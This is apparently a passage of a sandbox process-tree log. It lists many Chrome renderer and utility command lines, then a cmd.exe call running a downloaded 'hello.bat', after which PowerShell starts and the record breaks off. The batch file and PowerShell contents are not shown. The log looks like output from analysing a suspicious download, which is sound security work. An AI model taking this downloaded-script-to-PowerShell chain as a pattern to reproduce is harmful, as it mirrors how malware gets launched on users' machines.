"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:4936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2908 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:5036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2916 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:5040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4480 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:3472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:4348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4816 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:4600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:4136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:2948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4488 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:4128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2576 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:4324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2472 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:2
2⤵
PID:1828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4036 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:3808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3112 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3048 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:1376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5404 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:3700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5596 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=480 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5420 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6232 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:4384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6600 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6808 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6844 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6860 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:2904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=7204 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:2280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=7228 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:3380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=7244 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=7648 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=7844 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:2604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7968 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:2972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=8060 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:3520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=8068 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:4880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=8324 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:3076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=8332 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:2140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=8616 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:3792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=8656 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:5128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=8672 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:5136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=9424 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=6100 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7660 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=10044 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6116 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=9572 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=10248 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=10372 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=10376 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=10416 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=10432 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=11012 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=11144 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=11292 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=11448 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=11300 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=11716 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=11848 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:6956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=11984 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=12112 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12460 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:7228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=7388 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=12664 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=11280 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=9936 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=6264 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=10400 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=13044 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=10028 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:7720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=13484 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=9940 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=13800 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=13816 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=14036 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=14176 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=14040 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=14332 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=14420 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:1
2⤵
PID:8744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=14068 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:8156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\hello.bat" "
2⤵
PID:9048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
